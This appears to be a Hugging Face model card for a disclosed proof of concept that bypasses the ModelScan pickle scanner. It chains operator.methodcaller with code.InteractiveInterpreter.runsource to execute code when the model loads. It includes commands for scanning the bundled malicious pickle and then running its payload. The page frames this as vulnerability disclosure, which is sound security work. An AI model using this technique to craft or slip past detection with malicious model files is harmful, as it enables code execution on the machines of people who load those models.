ModelScan Bypass PoC: code.InteractiveInterpreter.runsource() + operator.methodcaller()
Overview
This is a proof-of-concept demonstrating a new bypass of ProtectAI ModelScan (v0.8.x), the model scanner used by HuggingFace to detect malicious pickle models.
Bypass Mechanism
ModelScan blocks pickle GLOBAL opcodes for known dangerous modules (os, subprocess, pickle, builtins.eval, etc.)
but fails to block code.InteractiveInterpreter and operator.methodcaller.
The exploit chain:
operator.methodcaller("runsource", PAYLOAD)(code.InteractiveInterpreter())
= code.InteractiveInterpreter().runsource(PAYLOAD)
= compile(PAYLOAD) + exec(PAYLOAD)
Files
| File | Format | Description |
|---|---|---|
code_bypass.pkl |
Pickle (v5) | Raw pickle file, 171 bytes |
code_bypass.joblib |
joblib | .joblib format, 298 bytes |
Verification
# Install modelscan
pip install modelscan
# Scan - will report "No issues found"
modelscan --path code_bypass.pkl
# Execute - will run the payload
python -c "import pickle; pickle.load(open('code_bypass.pkl','rb'))"
Disclosure
- Researcher: xiaoyaoes
- Date: 2026-06-18
- Status: Reported via Huntr MFV program
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support